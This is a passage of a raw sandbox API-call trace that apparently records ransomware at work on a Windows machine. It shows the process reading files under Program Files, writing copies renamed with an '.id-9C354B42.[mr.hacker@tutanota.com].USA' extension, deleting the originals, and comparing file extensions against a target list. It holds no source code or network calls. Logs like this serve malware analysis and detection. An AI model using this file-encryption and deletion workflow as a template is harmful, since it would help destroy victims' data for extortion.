returned 4 [0049.077] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.352] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=44302) returned 1 [0049.373] CloseHandle (hObject=0x210) returned 1 [0049.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png")) returned 0x20 [0049.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0049.373] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0049.373] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.374] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.374] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0049.374] GetLastError () returned 0x0 [0049.374] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xad0e, lpOverlapped=0x0) returned 1 [0049.376] WriteFile (in: hFile=0x1d0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xad10, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xad10, lpOverlapped=0x0) returned 1 [0049.378] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0049.378] WriteFile (in: hFile=0x1d0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.378] SetEndOfFile (hFile=0x1d0) returned 1 [0049.378] CloseHandle (hObject=0x1d0) returned 1 [0049.378] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.378] SetEndOfFile (hFile=0x210) returned 1 [0049.379] CloseHandle (hObject=0x210) returned 1 [0049.379] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.379] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png")) returned 1 [0049.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0049.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0049.380] lstrlenW (lpString=".doc") returned 4 [0049.380] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.380] lstrlenW (lpString=".docx") returned 5 [0049.380] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.380] lstrlenW (lpString=".pdf") returned 4 [0049.380] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.380] lstrlenW (lpString=".xls") returned 4 [0049.380] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.380] lstrlenW (lpString=".xlsx") returned 5 [0049.380] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.380] lstrlenW (lpString=".ppt") returned 4 [0049.380] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0049.380] lstrlenW (lpString=".zip") returned 4 [0049.380] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.380] lstrlenW (lpString=".rar") returned 4 [0049.380] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.380] lstrlenW (lpString=".bz2") returned 4 [0049.380] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.380] lstrlenW (lpString=".7z") returned 3 [0049.380] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0049.380] lstrlenW (lpString=".dbf") returned 4 [0049.380] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0049.380] lstrlenW (lpString=".1cd") returned 4 [0049.380] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0049.380] lstrlenW (lpString=".jpg") returned 4 [0049.380] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.382] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.382] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.382] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0049.383] GetLastError () returned 0x0 [0049.383] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x2cc, lpOverlapped=0x0) returned 1 [0049.384] WriteFile (in: hFile=0x1d0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x2d0, lpOverlapped=0x0) returned 1 [0049.385] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0049.385] WriteFile (in: hFile=0x1d0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xfc, lpOverlapped=0x0) returned 1 [0049.385] SetEndOfFile (hFile=0x1d0) returned 1 [0049.386] CloseHandle (hObject=0x1d0) returned 1 [0049.386] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.386] SetEndOfFile (hFile=0x210) returned 1 [0049.386] CloseHandle (hObject=0x210) returned 1 [0049.386] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.387] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config")) returned 1 [0049.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.387] lstrlenW (lpString=".doc") returned 4 [0049.387] lstrcmpiW (lpString1=".doc", lpString2="nfig") returned -1 [0049.387] lstrlenW (lpString=".docx") returned 5 [0049.387] lstrcmpiW (lpString1=".docx", lpString2="onfig") returned -1 [0049.387] lstrlenW (lpString=".pdf") returned 4 [0049.387] lstrcmpiW (lpString1=".pdf", lpString2="nfig") returned -1 [0049.387] lstrlenW (lpString=".xls") returned 4 [0049.387] lstrcmpiW (lpString1=".xls", lpString2="nfig") returned -1 [0049.387] lstrlenW (lpString=".xlsx") returned 5 [0049.387] lstrcmpiW (lpString1=".xlsx", lpString2="onfig") returned -1 [0049.387] lstrlenW (lpString=".ppt") returned 4 [0049.387] lstrcmpiW (lpString1=".ppt", lpString2="nfig") returned -1 [0049.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.387] lstrlenW (lpString=".zip") returned 4 [0049.387] lstrcmpiW (lpString1=".zip", lpString2="nfig") returned -1 [0049.387] lstrlenW (lpString=".rar") returned 4 [0049.387] lstrcmpiW (lpString1=".rar", lpString2="nfig") returned -1 [0049.387] lstrlenW (lpString=".bz2") returned 4 [0049.387] lstrcmpiW (lpString1=".bz2", lpString2="nfig") returned -1 [0049.387] lstrlenW (lpString=".7z") returned 3 [0049.388] lstrcmpiW (lpString1=".7z", lpString2="fig") returned -1 [0049.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.388] lstrlenW (lpString=".dbf") returned 4 [0049.388] lstrcmpiW (lpString1=".dbf", lpString2="nfig") returned -1 [0049.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.388] lstrlenW (lpString=".1cd") returned 4 [0049.388] lstrcmpiW (lpString1=".1cd", lpString2="nfig") returned -1 [0049.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.388] lstrlenW (lpString=".jpg") returned 4 [0049.388] lstrcmpiW (lpString1=".jpg", lpString2="nfig") returned -1 [0049.388] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.388] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.389] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0049.389] GetLastError () returned 0x0 [0049.389] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x296a5, lpOverlapped=0x0) returned 1 [0049.393] WriteFile (in: hFile=0x1d0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x296b0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x296b0, lpOverlapped=0x0) returned 1 [0049.397] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0049.397] WriteFile (in: hFile=0x1d0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.397] SetEndOfFile (hFile=0x1d0) returned 1 [0049.397] CloseHandle (hObject=0x1d0) returned 1 [0049.397] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.397] SetEndOfFile (hFile=0x210) returned 1 [0049.399] CloseHandle (hObject=0x210) returned 1 [0049.399] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.399] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg")) returned 1 [0049.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.399] lstrlenW (lpString=".doc") returned 4 [0049.400] lstrcmpiW (lpString1=".doc", lpString2=".MSG") returned -1 [0049.400] lstrlenW (lpString=".docx") returned 5 [0049.400] lstrcmpiW (lpString1=".docx", lpString2="T.MSG") returned -1 [0049.400] lstrlenW (lpString=".pdf") returned 4 [0049.400] lstrcmpiW (lpString1=".pdf", lpString2=".MSG") returned 1 [0049.400] lstrlenW (lpString=".xls") returned 4 [0049.400] lstrcmpiW (lpString1=".xls", lpString2=".MSG") returned 1 [0049.400] lstrlenW (lpString=".xlsx") returned 5 [0049.400] lstrcmpiW (lpString1=".xlsx", lpString2="T.MSG") returned -1 [0049.400] lstrlenW (lpString=".ppt") returned 4 [0049.400] lstrcmpiW (lpString1=".ppt", lpString2=".MSG") returned 1 [0049.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.400] lstrlenW (lpString=".zip") returned 4 [0049.400] lstrcmpiW (lpString1=".zip", lpString2=".MSG") returned 1 [0049.400] lstrlenW (lpString=".rar") returned 4 [0049.400] lstrcmpiW (lpString1=".rar", lpString2=".MSG") returned 1 [0049.400] lstrlenW (lpString=".bz2") returned 4 [0049.400] lstrcmpiW (lpString1=".bz2", lpString2=".MSG") returned -1 [0049.400] lstrlenW (lpString=".7z") returned 3 [0049.400] lstrcmpiW (lpString1=".7z", lpString2="MSG") returned -1 [0049.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.400] lstrlenW (lpString=".dbf") returned 4 [0049.400] lstrcmpiW (lpString1=".dbf", lpString2=".MSG") returned -1 [0049.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.400] lstrlenW (lpString=".1cd") returned 4 [0049.400] lstrcmpiW (lpString1=".1cd", lpString2=".MSG") returned -1 [0049.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.400] lstrlenW (lpString=".jpg") returned 4 [0049.400] lstrcmpiW (lpString1=".jpg", lpString2=".MSG") returned -1 [0049.405] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.405] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.405] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\desktop.ini.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0049.405] GetLastError () returned 0x0 [0049.405] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xae, lpOverlapped=0x0) returned 1 [0049.406] WriteFile (in: hFile=0x1d0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xb0, lpOverlapped=0x0) returned 1 [0049.407] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0049.407] WriteFile (in: hFile=0x1d0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.407] SetEndOfFile (hFile=0x1d0) returned 1 [0049.407] CloseHandle (hObject=0x1d0) returned 1 [0049.407] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.407] SetEndOfFile (hFile=0x210) returned 1 [0049.410] CloseHandle (hObject=0x210) returned 1 [0049.410] SetFileAttributesW (lpFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x26) returned 1 [0049.410] DeleteFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini")) returned 1 [0049.410] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.410] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.410] lstrlenW (lpString=".doc") returned 4 [0049.410] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0049.410] lstrlenW (lpString=".docx") returned 5 [0049.410] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0049.410] lstrlenW (lpString=".pdf") returned 4 [0049.410] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0049.410] lstrlenW (lpString=".xls") returned 4 [0049.411] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0049.411] lstrlenW (lpString=".xlsx") returned 5 [0049.411] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0049.411] lstrlenW (lpString=".ppt") returned 4 [0049.411] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0049.411] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.411] lstrlenW (lpString=".zip") returned 4 [0049.411] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0049.411] lstrlenW (lpString=".rar") returned 4 [0049.411] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0049.411] lstrlenW (lpString=".bz2") returned 4 [0049.411] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0049.411] lstrlenW (lpString=".7z") returned 3 [0049.411] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0049.411] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.411] lstrlenW (lpString=".dbf") returned 4 [0049.411] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0049.411] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.411] lstrlenW (lpString=".1cd") returned 4 [0049.411] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0049.411] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.411] lstrlenW (lpString=".jpg") returned 4 [0049.411] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0053.149] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.149] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0053.150] GetLastError () returned 0x0 [0053.150] ReadFile (in: hFile=0x220, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x4932, lpOverlapped=0x0) returned 1 [0053.154] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4940, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x4940, lpOverlapped=0x0) returned 1 [0053.156] ReadFile (in: hFile=0x220, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.156] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe4, lpOverlapped=0x0) returned 1 [0053.156] SetEndOfFile (hFile=0x1a0) returned 1 [0053.156] CloseHandle (hObject=0x1a0) returned 1 [0053.156] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.156] SetEndOfFile (hFile=0x220) returned 1 [0053.157] CloseHandle (hObject=0x220) returned 1 [0053.157] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.157] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl")) returned 1 [0053.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.158] lstrlenW (lpString=".doc") returned 4 [0053.158] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0053.158] lstrlenW (lpString=".docx") returned 5 [0053.158] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0053.158] lstrlenW (lpString=".pdf") returned 4 [0053.158] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0053.158] lstrlenW (lpString=".xls") returned 4 [0053.158] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0053.158] lstrlenW (lpString=".xlsx") returned 5 [0053.158] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0053.158] lstrlenW (lpString=".ppt") returned 4 [0053.158] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0053.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.158] lstrlenW (lpString=".zip") returned 4 [0053.158] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0053.158] lstrlenW (lpString=".rar") returned 4 [0053.158] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0053.158] lstrlenW (lpString=".bz2") returned 4 [0053.158] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0053.158] lstrlenW (lpString=".7z") returned 3 [0053.158] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0053.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.158] lstrlenW (lpString=".dbf") returned 4 [0053.158] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0053.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.159] lstrlenW (lpString=".1cd") returned 4 [0053.159] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0053.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.159] lstrlenW (lpString=".jpg") returned 4 [0053.159] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0053.200] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=11891) returned 1 [0053.200] CloseHandle (hObject=0x1b4) returned 1 [0053.200] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif")) returned 0x20 [0053.200] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 